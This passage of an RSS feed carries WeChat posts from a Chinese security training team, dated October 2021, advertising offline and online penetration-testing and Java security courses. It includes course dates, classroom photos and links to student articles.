href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=3&amp;sn=2fbb397c78aecce9738f3a96508da153&amp;chksm=fa8b1a28cdfc933e7fa5a420b8f23724892968655aa52818f6e8c5fb8c8ad55aa2ebaff8be1c&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="outline: 0px;color: rgb(255, 0, 0);-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节首期内网渗透线上课开班啦！！！</strong></span></a></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><br style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485360&amp;idx=4&amp;sn=be8a34c98d5d1b8e19b757c2f5357f37&amp;chksm=fa8b1a28cdfc933e30ba933e257325afd2df688605e4e3bc3ea6af6bce68785f235eaa0205a7&amp;scene=21#wechat_redirect" data-itemshowtype="0" tab="innerlink" data-linktype="2" wah-hotarea="click" style="outline: 0px;color: rgb(255, 0, 0);-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">宽字节第二期JAVA安全进阶线上课开班啦！！！</strong></span></a></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;"><br/></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;outline: 0px;font-weight: bold;font-size: 22px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);color: black;box-sizing: border-box !important;overflow-wrap: break-word !important;">联系我们</h2><p style="text-align: center;"><img class="rich_pages wxw-img" data-fileid="100001413" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485511">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=03108c0d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485511%26idx%3D1%26sn%3D087e7f37e9044fdf103a1064aedee0f2%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 23 Oct 2021 13:03:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节安全“第二期线下就业班”重磅来袭！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485461&amp;idx=1&amp;sn=29f69954c0caed34986ea2ace348c991</link>
      <description>&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-10-07 12:32</span> <span style="display: inline-block;"></span>
</p>

<p>"任何职业都可以成为黑客。" ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3d57459d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyCia1G52RNH1EzyFqbsQSjQtnIYad2mezC1ma24I5N5VLDPYNQl3GHnw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><blockquote data-tool="mdnice编辑器" style="font-size: 0.9em;border-top: none;border-right: none;border-bottom: none;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。</p></blockquote><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线下就业班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=2&amp;sn=ba0c436a8656b65a90a120250a6670be&amp;chksm=fa8b1a66cdfc937075e55cda1a1b3f38b16a8ea6925efcb6dbbdbdc30cd99ff289e0853d2f2e&amp;scene=21#wechat_redirect" textvalue="宽字节安全线下培训班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">宽字节安全线下就业班</span></a> 第二期，于 2021 年 11 月 25 号开班。</p><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线上专题班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=3&amp;sn=663da8762314aff8bcf0e359b1107f0f&amp;chksm=fa8b1a66cdfc937008f2d300f78e22b81a04a3ab429e2e1d0ef3931002e09f06ae36abe67231&amp;scene=21#wechat_redirect" textvalue="内网渗透专题班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">内网渗透专题班</span></a> ，于 2021 年 11 月 15 号开班。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=4&amp;sn=79c3f911a4c077de56163ba30783f0f3&amp;chksm=fa8b1a66cdfc9370d918a50263dabfb359dd77c858ec187816601505dd7bd0e3aea4c59eb77d&amp;scene=21#wechat_redirect" textvalue="JAVA安全专题班 第二期" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">JAVA安全专题班 第二期</span></a> ，于 2021 年 11 月 15 号开班。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么办培训</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;text-indent: 2em;">宽字节安全团队自成立以来，一直想做很多事情，例如漏洞挖掘，红蓝对抗，C2开发，漏洞复现等等。但是我们精力有限，所以我们选择全职创业来完成自己的梦想。我们想将我们在一线攻防领域的经验分享给大家。一方面，我们需要培训来积累启动资金，另一方面能通过培训去结识志同道合的伙伴一起做有趣的事。</section><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么选择我们</h2><ol data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽字节有自己的安全理念，不同于只讲解工具使用的教程，宽字节<strong><span style="color: rgb(255, 0, 0);">更注重原理与基础</span></strong>，万丈高楼平地起，我们将带领学员深入漏洞的本质，探索安全的魅力</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">团队有丰富的红蓝对抗经验，一线红队与安全研究的师傅全程线下授课</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">教学内容通俗易懂，贴合实战，<strong><span style="color: rgb(255, 0, 0);">紧密贴合一线攻防人员的需求</span></strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽敞明亮的教室，各种靶机供学员练习，良好的学习氛围</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">大量的信息安全类书籍供学员借阅，内部资料向学员开放</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">有了 <strong>第一期培训</strong> 的经验，我们重新梳理细化了整个课程体系和教学资料。增加了 <span style="color: rgb(255, 0, 0);"><strong>阶梯性教学</strong> </span>和 <span style="color: rgb(255, 0, 0);"><strong>分班机制</strong></span> 。让基础好的同学能够在学习中沉淀更多东西，基础较弱的同学增加大量基础内容的实战训练，快速提升。让学员在完成培训后，能够深入本质，熟悉漏洞的成因，利用与防护规则。独立完成整个渗透测试流程，积累一定的漏洞分析，内网渗透，域渗透的经验，对安全有自己的认识。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>宽字节安全第一期线下培训已经进行了一半了，来一起看看下线培训的情况吧</strong>。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>展示</h2><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">内部 Wiki</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5461658841940532" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1917" src="https://wechat2rss.xlab.app/img-proxy/?k=d406714c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyPHTg6VZhU2mvw4Sk0yCr6Plq656Mm96cjYLIFdmZEBu7CibrgkaeA0Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6217783505154639" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1552" src="https://wechat2rss.xlab.app/img-proxy/?k=33dd498c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy0Z8pWAAv9QsCQsicUdEiaeHMicXm4z2SwicdRjNpttvNcTufnibeibcViaUyg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.8030203545633617" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1523" src="https://wechat2rss.xlab.app/img-proxy/?k=529ed250&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyZiaTFQRW1ibwibiceUkslVOQgMYJSWXZJVhMF8oy6XEia8fGTeeE6wbZN4w%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习环境</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=cc930810&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyOekrplmYFPMWyDJvJD2rEOlp6tdYZZaCK1TMwhicktUmSnibb0AVwYCw%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.46171875" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=695b456f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyj6Goric360GYf4AA47hXvSSPU4KTCVfvl5Bibs2UN7worfFdRDWkibbmA%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习氛围</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=d94eebef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyLoWZ6pjiaPHHicLawngSqZnSI1lgBqdYyQoqG17IzkCuSfTyKpXLyBnQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=7aa3ab25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRysRdcZU4N0lPhpsn5R0pichur2Q4Ty5FUE0xExJ2Ep4EZM8Ra4U2knyw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">学员们自行组织相约早晨 7点多 提前到教室学习，学到晚上十点以后走已经成了大家的日常，无任何强制性，全凭大家对网络安全的热爱。</p><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="2.132492113564669" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="317" src="https://wechat2rss.xlab.app/img-proxy/?k=59656361&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRySCgJPadO37ofnkqlAffZBtGtlhOy7LzaiaoVT0edzLo9sfvZFRJ4XFw%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员笔记</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.39803625377643503" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1324" src="https://wechat2rss.xlab.app/img-proxy/?k=9ef4ff43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyQAWSMBmAX9Eey8XX0F1ibENgibccKibRUKTJ2bRL8PAuS8tsjgR2gLvibQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6163522012578616" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=d8918914&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRymHaCBuiaibeKeiaqVNt4mswkqyicJt2TicuCGkAo9rR0NSHyUvh1LJIB4lg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5453501722158438" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1742" src="https://wechat2rss.xlab.app/img-proxy/?k=84e9745f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy6xtMTAOaO3Rv9DceR4PBxNN8dnzIU0h6S1NRQlWajurYgBtf5XiaEOQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6302521008403361" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=fe44f0cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyvrBlYca7AsviaHg7iapvpj5NsJOwuoJWJ27ur0GmybV3qN2ycEynpEcA%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员文章</section></li></ul></section><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 名称解析机制" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 名称解析机制</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485292&amp;idx=1&amp;sn=033571585b6565290b17d85d241d50ba&amp;chksm=fa8b1af4cdfc93e23ab0e2f24b86eca5073e62a733dc1ffc82eb87b44f76b87f75ac56174a11&amp;scene=21#wechat_redirect" textvalue="记一次 mssql 注入到 getshell" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 mssql 注入到 getshell</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485235&amp;idx=1&amp;sn=2b68f16d107880349d9e241f6f03db2a&amp;chksm=fa8b1aabcdfc93bdc2397a4b9143d2a42a626090b574e7c83b3d9f57e88950fa6dfefebf97a3&amp;scene=21#wechat_redirect" textvalue="记一次 weblogic 的域渗透实战" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 weblogic 的域渗透实战</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485181&amp;idx=1&amp;sn=65ac8c1db32b1e849533438a4d7bba1d&amp;chksm=fa8b1b65cdfc9273e99f90f1446c8a230ad92edfb9e7d75fb8396c9bfbb62db77bdeb3746a04&amp;scene=21#wechat_redirect" textvalue="利用安全描述符隐藏服务后门进行权限维持" data-itemshowtype="0" tab="innerlink" data-linktype="2">利用安全描述符隐藏服务后门进行权限维持</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 身份认证" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 身份认证</a></p><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实战项目</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">涉密，暂不展示。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>联系我们</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485461">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2d089710&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485461%26idx%3D1%26sn%3D29f69954c0caed34986ea2ace348c991%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 07 Oct 2021 12:32:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节安全“第二期线下就业班”重磅来袭！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485459&amp;idx=1&amp;sn=b908ac5751e62764e0e1c23ce498a819</link>
      <description>&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-10-05 10:30</span> <span style="display: inline-block;"></span>
</p>

<p>"任何职业都可以成为黑客。" ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3d57459d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyCia1G52RNH1EzyFqbsQSjQtnIYad2mezC1ma24I5N5VLDPYNQl3GHnw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><blockquote data-tool="mdnice编辑器" style="font-size: 0.9em;border-top: none;border-right: none;border-bottom: none;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。</p></blockquote><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线下就业班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=2&amp;sn=ba0c436a8656b65a90a120250a6670be&amp;chksm=fa8b1a66cdfc937075e55cda1a1b3f38b16a8ea6925efcb6dbbdbdc30cd99ff289e0853d2f2e&amp;scene=21#wechat_redirect" textvalue="宽字节安全线下培训班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">宽字节安全线下就业班</span></a> 第二期，于 2021 年 11 月 25 号开班。</p><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线上专题班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=3&amp;sn=663da8762314aff8bcf0e359b1107f0f&amp;chksm=fa8b1a66cdfc937008f2d300f78e22b81a04a3ab429e2e1d0ef3931002e09f06ae36abe67231&amp;scene=21#wechat_redirect" textvalue="内网渗透专题班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">内网渗透专题班</span></a> ，于 2021 年 11 月 15 号开班。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=4&amp;sn=79c3f911a4c077de56163ba30783f0f3&amp;chksm=fa8b1a66cdfc9370d918a50263dabfb359dd77c858ec187816601505dd7bd0e3aea4c59eb77d&amp;scene=21#wechat_redirect" textvalue="JAVA安全专题班 第二期" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">JAVA安全专题班 第二期</span></a> ，于 2021 年 11 月 15 号开班。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么办培训</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 